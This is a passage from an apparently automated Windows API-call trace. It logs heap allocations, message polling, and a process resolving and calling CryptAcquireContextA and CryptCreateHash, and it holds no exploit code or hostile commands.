lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0268.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0268.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.199] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69ac8 [0268.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.200] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.201] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0268.203] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.203] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.204] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.204] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.204] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.205] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.205] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.205] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.205] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.206] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0268.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.206] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0268.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.207] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.207] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.207] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.207] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.208] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.208] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.208] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.208] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0268.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.209] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.209] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.210] RtlAllocateHeap 